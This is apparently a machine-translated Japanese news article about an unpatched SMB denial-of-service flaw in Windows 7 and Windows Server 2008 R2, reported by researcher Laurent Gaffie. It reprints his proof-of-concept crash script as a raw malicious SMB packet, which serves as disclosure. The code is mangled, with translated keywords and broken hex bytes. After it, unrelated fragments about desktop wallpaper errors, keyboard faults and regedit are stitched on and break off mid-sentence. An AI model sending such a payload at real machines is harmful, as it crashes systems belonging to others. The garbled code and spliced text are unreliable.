マイクロソフトの昨日は、Microsoftは現在この問題を調査しているのWindows7とWindowsServer2008R2がリモートシステムのカーネルの崩壊にシステムを攻撃し、導くために使用することができます抜け穴があるという報告があることを確認しました。
Microsoftの公式スポークスマンは、サービスの脆弱性のWindowsネットワークのファイルとプリンタの共有プロトコルServerMessageBlock(SMB)拒否としてこの脆弱性が存在しますが、これまでのところ、マイクロソフトはこの脆弱性の攻撃行動のケースを利用することが見出されていなかったと述べました。
セキュリティ専門家LaurentGaffie露出昨日のブログでハイクラスと評価この脆弱性および他の脆弱性、LaurentGaffieはこの脆弱性が無限ループを入力するSMBプロトコルの原因となりますことを示し、彼はまた、完全なコードを示しますを行いました。現在、この脆弱性を修正するためのパッチはありません。Gaffieは、マイクロソフトがパッチをリリースする前に、SMBの機能とポートをオフにすることをユーザーに推奨しています。
Gaffieは、ファイアウォールの設定方法にかかわらず、ハッカーがLANまたはIEを使用してシステムを攻撃する可能性があると指摘しました。 Gaffieは、脆弱性が唯一のWindows7とWindowsServer2008R2に影響を与え、他のシステムに影響を与えていないと述べました。
付属のコードでは、実証:
#win7-crash.py:
Win7のandserver2008R2(infiniteloop)上のリモートカーネルクラッシュ#Trigger
#Crash inKeAccumulateTicks 。thetarget :. \\ this_t_ip_addrBLAHから、瞬時にクラッシュ;()duetoNT_ASSERTは、()/DbgRaiseAssertionFailure()byan#infiniteloop
#NO BSODの原因となった、あなたはGOTTAは、
速く、それをトリガー#To
プラグを引っ張ります
#Author:ローランGaffié
#
インポートSocketServer
パケット= x00x00x00x9a#>長shouldbe9enot9a ..
xfex53x4dx42x40x00x00x00x00x00x00x00x00x00x01x00 < BR>
x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x41x00x01x00x02x02x00x00x30x82xa4x11xe3x12x23x41
xaax4bxadx99xfdx52x31x8dx01x00x00x00x00x00x01x00
x00x00x01x00x00x00x01x00xcfx73x67x74x62x60xcax01
xcbx51xe0x19x62x60xcax01x80x00x 1ex00x20x4cx4dx20
x60x1cx06x06x2bx06x01x05x05x02xa0x12x30x10xa0x0e
x30x0cx06x0ax2bx06x01x04x01x82x37x02x02x0a
デスクトップの壁紙のエラーを交換するWin7のシステムでは、プロンプト:壁紙、内部エラーとして画像を設定することはできません。この問題をどのように解決しますか。 1.まず、デスクトップの[コンピュータ
I.ノートパソコンのキーボードの故障自体 文字や数字の混乱の多くは、我々は、キーボードを押したときに、そのキーが押下された
1を行う方法をリソースマネージャを開くことができない、まずキーボードのWin + Rキーの組み合わせを押し、次に実行ダイアログボックスにregedit.exeと入力します。 Enterキーを押してレジ